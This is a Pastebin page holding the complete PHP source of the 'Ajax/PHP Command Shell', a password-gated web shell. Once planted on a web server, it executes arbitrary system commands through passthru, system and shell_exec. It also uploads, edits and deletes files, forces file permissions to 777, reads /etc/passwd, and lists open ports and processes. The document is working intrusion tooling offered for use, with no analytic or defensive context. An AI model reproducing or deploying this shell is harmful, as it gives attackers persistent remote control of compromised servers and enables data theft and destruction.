Advertisement
FlyFar

Ajax PHP Command Shell

Feb 8th, 2024
860
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 17.75 KB | Cybersecurity | 0 0
  1. <?php
  2. session_start();
  3.  
  4. error_reporting(0);
  5.  
  6. $password = "password";      //Change this to your password ;)
  7.  
  8. $version = "0.7B";
  9.  
  10. $functions = array('Clear Screen' => 'ClearScreen()',
  11. 'Clear History' => 'ClearHistory()',
  12. 'Can I function?' => "runcommand('canirun','GET')",
  13. 'Get server info' => "runcommand('showinfo','GET')",
  14. 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
  15. 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
  16. 'Running processes' => "runcommand('ps -aux','GET')",
  17. 'Readme' => "runcommand('shellhelp','GET')"
  18.  
  19. );
  20. $thisfile = basename(__FILE__);
  21.  
  22. $style = '<style type="text/css">
  23. .cmdthing {
  24.    border-top-width: 0px;
  25.    font-weight: bold;
  26.    border-left-width: 0px;
  27.    font-size: 10px;
  28.    border-left-color: #000000;
  29.    background: #000000;
  30.    border-bottom-width: 0px;
  31.    border-bottom-color: #FFFFFF;
  32.    color: #FFFFFF;
  33.    border-top-color: #008000;
  34.    font-family: verdana;
  35.    border-right-width: 0px;
  36.    border-right-color: #000000;
  37. }
  38. input,textarea {
  39.    border-top-width: 1px;
  40.    font-weight: bold;
  41.    border-left-width: 1px;
  42.    font-size: 10px;
  43.    border-left-color: #FFFFFF;
  44.    background: #000000;
  45.    border-bottom-width: 1px;
  46.    border-bottom-color: #FFFFFF;
  47.    color: #FFFFFF;
  48.    border-top-color: #FFFFFF;
  49.    font-family: verdana;
  50.    border-right-width: 1px;
  51.    border-right-color: #FFFFFF;
  52. }
  53. A:hover {
  54. text-decoration: none;
  55. }
  56.  
  57.  
  58. table,td,div {
  59. border-collapse: collapse;
  60. border: 1px solid #FFFFFF;
  61. }
  62. body {
  63. color: #FFFFFF;
  64. font-family: verdana;
  65. }
  66. </style>';
  67. $sess = __FILE__.$password;
  68. if(isset($_POST['p4ssw0rD']))
  69. {
  70.     if($_POST['p4ssw0rD'] == $password)
  71.     {
  72.         $_SESSION[$sess] = $_POST['p4ssw0rD'];
  73.     }
  74.     else
  75.     {
  76.         die("Wrong password");
  77.     }
  78.  
  79. }
  80. if($_SESSION[$sess] == $password)
  81. {
  82.     if(isset($_SESSION['workdir']))
  83.     {
  84.             if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
  85.         {
  86.             chdir($_SESSION['workdir']);
  87.         }
  88.     }
  89.  
  90.     if(isset($_FILES['uploadedfile']['name']))
  91.     {
  92.         $target_path = "./";
  93.         $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
  94.         if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  95.            
  96.         }
  97.     }
  98.  
  99.     if(isset($_GET['runcmd']))
  100.     {
  101.  
  102.         $cmd = $_GET['runcmd'];
  103.  
  104.         print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
  105.  
  106.         if($cmd == "")
  107.         {
  108.             print "Empty Command..type \"shellhelp\" for some ehh...help";
  109.         }
  110.  
  111.         elseif($cmd == "upload")
  112.         {
  113.             print '<br>Uploading to: '.realpath(".");
  114.             if(is_writable(realpath(".")))
  115.             {
  116.                 print "<br><b>I can write to this directory</b>";
  117.             }
  118.             else
  119.             {
  120.                 print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
  121.             }
  122.  
  123.         }
  124.         elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
  125.         {
  126.                 if(file_exists($file[1]) && is_dir($file[1]))
  127.                 {
  128.                     chdir($file[1]);
  129.                     $_SESSION['workdir'] = $file[1];
  130.                     print "Current directory changed to ".$file[1];
  131.                 }
  132.             else
  133.             {
  134.                 print "Directory not found";
  135.             }
  136.         }
  137.  
  138.         elseif(strtolower($cmd) == "shellhelp")
  139.         {
  140. print '<b><font size=7>Ajax/PHP Command Shell</b></font>
  141. &copy; By Ironfist
  142.  
  143. The shell can be used by anyone to command any server, the main purpose was
  144. to create a shell that feels as dynamic as possible, is expandable and easy
  145. to understand.
  146.  
  147. If one of the command execution functions work, the shell will function fine.
  148. Try the "canirun" command to check this.
  149.  
  150. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
  151. not used to these commands, google a little.
  152.  
  153. <b>Custom Functions</b>
  154. If you want to add your own custom command in the Quick Commands list, check
  155. out the code. The $function array contains \'func name\' => \'javascript function\'.
  156. Take a look at the built-in functions for examples.
  157.  
  158. I know this readme isn\'t providing too much information, but hell, does this shell
  159. even require one :P
  160.  
  161. - Iron
  162.             ';
  163.  
  164.         }
  165.         elseif(ereg("editfile (.*)",$cmd,$file))
  166.         {
  167.             if(file_exists($file[1]) && !is_dir($file[1]))
  168.             {
  169.                 print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
  170.                 $contents = file($file[1]);
  171.                     foreach($contents as $line)
  172.                     {
  173.                         print htmlspecialchars($line);
  174.                     }
  175.                 print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
  176.             }
  177.             else
  178.             {
  179.             print "File not found.";
  180.             }
  181.         }
  182.         elseif(ereg("deletefile (.*)",$cmd,$file))
  183.         {
  184.             if(is_dir($file[1]))
  185.             {
  186.                 if(rmdir($file[1]))
  187.                 {
  188.                     print "Directory succesfully deleted.";
  189.                 }
  190.                 else
  191.                 {
  192.                     print "Couldn't delete directory!";
  193.                 }
  194.             }
  195.             else
  196.             {
  197.                 if(unlink($file[1]))
  198.                 {
  199.                     print "File succesfully deleted.";
  200.                 }
  201.                 else
  202.                 {
  203.                     print "Couldn't delete file!";
  204.                 }
  205.             }
  206.         }
  207.         elseif(strtolower($cmd) == "canirun")
  208.         {
  209.         print "If any of these functions is Enabled, the shell will function like it should.<br>";
  210.             if(function_exists(passthru))
  211.             {
  212.                 print "Passthru: <b><font color=green>Enabled</b></font><br>";
  213.             }
  214.             else
  215.             {
  216.                 print "Passthru: <b><font color=red>Disabled</b></font><br>";
  217.             }
  218.  
  219.             if(function_exists(exec))
  220.             {
  221.                 print "Exec: <b><font color=green>Enabled</b></font><br>";
  222.             }
  223.             else
  224.             {
  225.                 print "Exec: <b><font color=red>Disabled</b></font><br>";
  226.             }
  227.  
  228.             if(function_exists(system))
  229.             {
  230.                 print "System: <b><font color=green>Enabled</b></font><br>";
  231.             }
  232.             else
  233.             {
  234.                 print "System: <b><font color=red>Disabled</b></font><br>";
  235.             }
  236.             if(function_exists(shell_exec))
  237.             {
  238.                 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
  239.             }
  240.             else
  241.             {
  242.                 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
  243.             }
  244.         print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
  245.         if( ini_get('safe_mode') ){
  246.             print "Safe Mode: <b><font color=red>Enabled</b></font>";
  247.         }
  248.             else
  249.         {
  250.             print "Safe Mode: <b><font color=green>Disabled</b></font>";
  251.         }
  252.         print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
  253.             if( ini_get('open_basedir') ){
  254.                 print "Open_basedir: <b><font color=red>Enabled</b></font>";
  255.             }
  256.             else
  257.             {
  258.                 print "Open_basedir: <b><font color=green>Disabled</b></font>";
  259.             }
  260.         }
  261.         //About the shell
  262.         elseif(ereg("listdir (.*)",$cmd,$directory))
  263.         {
  264.  
  265.             if(!file_exists($directory[1]))
  266.             {
  267.                 die("Directory not found");
  268.             }
  269.             //Some variables
  270.             chdir($directory[1]);
  271.             $i = 0; $f = 0;
  272.             $dirs = "";
  273.             $filez = "";
  274.            
  275.                 if(!ereg("/$",$directory[1])) //Does it end with a slash?
  276.                 {
  277.                     $directory[1] .= "/"; //If not, add one
  278.                 }
  279.             print "Listing directory: ".$directory[1]."<br>";
  280.             print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
  281.            
  282.             if ($handle = opendir($directory[1])) {
  283.                while (false !== ($file = readdir($handle))) {
  284.                    if(is_dir($file))
  285.                    {
  286.                        $dirs[$i]  = $file;
  287.                        $i++;
  288.                    }
  289.                    else
  290.                    {
  291.                        $filez[$f] = $file;
  292.                        $f++;
  293.                    }
  294.                    
  295.                }
  296.                print "<td>";
  297.                
  298.                foreach($dirs as $directory)
  299.                {
  300.                     print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
  301.                }
  302.                
  303.                print "</td><td>";
  304.                
  305.                foreach($filez as $file)
  306.                {
  307.                 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
  308.                }
  309.                
  310.                print "</td></table>";
  311.             }
  312.         }
  313.         elseif(strtolower($cmd) == "about")
  314.         {
  315.             print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
  316.         }
  317.         //Show info
  318.         elseif(strtolower($cmd) == "showinfo")
  319.         {
  320.             if(function_exists(disk_free_space))
  321.             {
  322.                 $free = disk_free_space("/") / 1000000;
  323.             }
  324.             else
  325.             {
  326.                 $free = "N/A";
  327.             }
  328.             if(function_exists(disk_total_space))
  329.             {
  330.                 $total = trim(disk_total_space("/") / 1000000);
  331.             }
  332.             else
  333.             {
  334.                 $total = "N/A";
  335.             }
  336.             $path = realpath (".");
  337.            
  338.             print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
  339.            
  340.             if(function_exists(passthru))
  341.             {
  342.                 passthru("uname -a");
  343.             }
  344.             else
  345.             {
  346.                 print "Passthru is disabled :(";
  347.             }
  348.         }
  349.         //Read /etc/passwd
  350.         elseif(strtolower($cmd) == "etcpasswdfile")
  351.         {
  352.  
  353.             $pw = file('/etc/passwd/');
  354.             foreach($pw as $line)
  355.             {
  356.                 print $line;
  357.             }
  358.  
  359.  
  360.         }
  361.         //Execute any other command
  362.         else
  363.         {
  364.  
  365.             if(function_exists(passthru))
  366.             {
  367.                 passthru($cmd);
  368.             }
  369.             else
  370.             {
  371.                 if(function_exists(exec))
  372.                 {
  373.                     exec("ls -la",$result);
  374.                     foreach($result as $output)
  375.                     {
  376.                         print $output."<br>";
  377.                     }
  378.                 }
  379.                 else
  380.                 {
  381.                 if(function_exists(system))
  382.                 {
  383.                     system($cmd);
  384.                 }
  385.                 else
  386.                 {
  387.                     if(function_exists(shell_exec))
  388.                     {
  389.                         print shell_exec($cmd);
  390.                     }
  391.                         else
  392.                         {
  393.                         print "Sorry, none of the command functions works.";
  394.                         }
  395.                     }
  396.                 }
  397.             }
  398.         }
  399.     }
  400.  
  401.     elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
  402.     {
  403.         $file = $_POST['filetosave'];
  404.         if(!is_writable($file))
  405.         {
  406.             if(!chmod($file, 0777))
  407.             {
  408.                 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
  409.             }
  410.         }
  411.        
  412.         $fh = fopen($file, 'w');
  413.         $dt = $_POST['filecontent'];
  414.         fwrite($fh, $dt);
  415.         fclose($fh);
  416.     }
  417.     else
  418.     {
  419. ?>
  420. <html>
  421. <title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
  422. <head>
  423. <?php print $style; ?>
  424. <SCRIPT TYPE="text/javascript">
  425. function sf(){document.cmdform.command.focus();}
  426. var outputcmd = "";
  427. var cmdhistory = "";
  428. function ClearScreen()
  429. {
  430.     outputcmd = "";
  431.     document.getElementById('output').innerHTML = outputcmd;
  432. }
  433.  
  434. function ClearHistory()
  435. {
  436.     cmdhistory = "";
  437.     document.getElementById('history').innerHTML = cmdhistory;
  438. }
  439.  
  440. function deletefile(file)
  441. {
  442.     deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
  443.     if(deleteit)
  444.     {
  445.         runcommand('deletefile ' + file,'GET');
  446.     }
  447. }
  448.  
  449. var http_request = false;
  450. function makePOSTRequest(url, parameters) {
  451.   http_request = false;
  452.   if (window.XMLHttpRequest) {
  453.      http_request = new XMLHttpRequest();
  454.      if (http_request.overrideMimeType) {
  455.         http_request.overrideMimeType('text/html');
  456.      }
  457.   } else if (window.ActiveXObject) {
  458.      try {
  459.         http_request = new ActiveXObject("Msxml2.XMLHTTP");
  460.      } catch (e) {
  461.         try {
  462.            http_request = new ActiveXObject("Microsoft.XMLHTTP");
  463.         } catch (e) {}
  464.      }
  465.   }
  466.   if (!http_request) {
  467.      alert('Cannot create XMLHTTP instance');
  468.      return false;
  469.   }
  470.  
  471.  
  472.   http_request.open('POST', url, true);
  473.   http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  474.   http_request.setRequestHeader("Content-length", parameters.length);
  475.   http_request.setRequestHeader("Connection", "close");
  476.   http_request.send(parameters);
  477. }
  478.  
  479.  
  480. function SaveFile()
  481. {
  482. var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
  483.                     "&filecontent=" + encodeURI( document.getElementById("area1").value );
  484. makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
  485. document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
  486. }
  487.  
  488. function runcommand(urltoopen,action,contenttosend){
  489. cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
  490. document.getElementById('history').innerHTML = cmdhistory;
  491. if(urltoopen == "clear")
  492. {
  493. ClearScreen();
  494. }
  495.     var ajaxRequest;
  496.     try{
  497.         ajaxRequest = new XMLHttpRequest();
  498.     } catch (e){
  499.         try{
  500.             ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
  501.         } catch (e) {
  502.             try{
  503.                 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
  504.             } catch (e){
  505.                 alert("Wicked error, nothing we can do about it...");
  506.                 return false;
  507.             }
  508.         }
  509.     }
  510.     ajaxRequest.onreadystatechange = function(){
  511.         if(ajaxRequest.readyState == 4){
  512.         outputcmd = "<pre>"  + outputcmd + ajaxRequest.responseText +"</pre>";
  513.             document.getElementById('output').innerHTML = outputcmd;
  514.             var objDiv = document.getElementById("output");
  515.             objDiv.scrollTop = objDiv.scrollHeight;
  516.         }
  517.     }
  518.     ajaxRequest.open(action, "?runcmd="+urltoopen , true);
  519.     if(action == "GET")
  520.     {
  521.     ajaxRequest.send(null);
  522.     }
  523.     document.cmdform.command.value='';
  524.     return false;
  525. }
  526.  
  527. function set_tab_html(newhtml)
  528. {
  529. document.getElementById('commandtab').innerHTML = newhtml;
  530. }
  531.  
  532. function set_tab(newtab)
  533. {
  534.     if(newtab == "cmd")
  535.     {
  536.         newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
  537.     }
  538.     else if(newtab == "upload")
  539.     {
  540.         runcommand('upload','GET');
  541.         newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
  542.     }
  543.     else if(newtab == "workingdir")
  544.     {
  545.         <?php
  546.         $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
  547.         $pathparts = explode("/",realpath ("."));
  548.         foreach($pathparts as $folder)
  549.         {
  550.         $folders .= $folder."/";
  551.         }
  552.         $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\"  onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
  553.  
  554.         ?>
  555.         newhtml = '<?php print $folders; ?>';
  556.     }
  557.     else if(newtab == "filebrowser")
  558.     {
  559.         newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
  560.         runcommand('listdir .','GET');
  561.     }
  562.     else if(newtab == "createfile")
  563.     {
  564.         newhtml = '<b>File Editor, under construction.</b>';
  565.         document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
  566.        
  567.     }
  568.         document.getElementById('commandtab').innerHTML = newhtml;
  569. }
  570. </script>
  571. </head>
  572. <body bgcolor=black onload="sf();" vlink=white alink=white link=white>
  573. <table border=1 width=100% height=100%>
  574. <td width=15% valign=top>
  575.  
  576. <form name="extras"><br>
  577. <center><b>Quick Commands</b><br>
  578.  
  579. <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
  580. <?php
  581. foreach($functions as $name => $execute)
  582. {
  583. print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
  584. }
  585. ?>
  586.  
  587. </center>
  588.  
  589. </div>
  590. </form>
  591. <center><b>Command history</b><br></center>
  592. <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
  593. <br>
  594. <center><b>About</b><br></center>
  595. <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
  596. <br>
  597. <b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
  598. <br>
  599. Version <?php print $version; ?>
  600.  
  601. <br>
  602. <br>
  603.  
  604. <br>Thanks to everyone @
  605. <a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
  606. <br>
  607. <a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
  608. <br>
  609. and special greetings to everyone in rootshell
  610. </div>
  611.  
  612. </td>
  613. <td width=70%>
  614. <table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
  615. <b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
  616. <b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
  617. <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
  618. <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
  619. <b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
  620.  
  621. </font></td>
  622. <tr>
  623. <td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
  624.  
  625. <tr>
  626. <td  height=1% width=100% valign=top>
  627. <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
  628. &nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
  629. <b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
  630. </form>
  631. </div>
  632. </td>
  633. </table>
  634. </td>
  635. </table>
  636. </body>
  637. </html>
  638. <?php
  639. }
  640. } else {
  641. print "<center><table border=0  height=100%>
  642. <td valign=middle>
  643. <form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
  644. </form>";
  645. }
  646. ?>  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement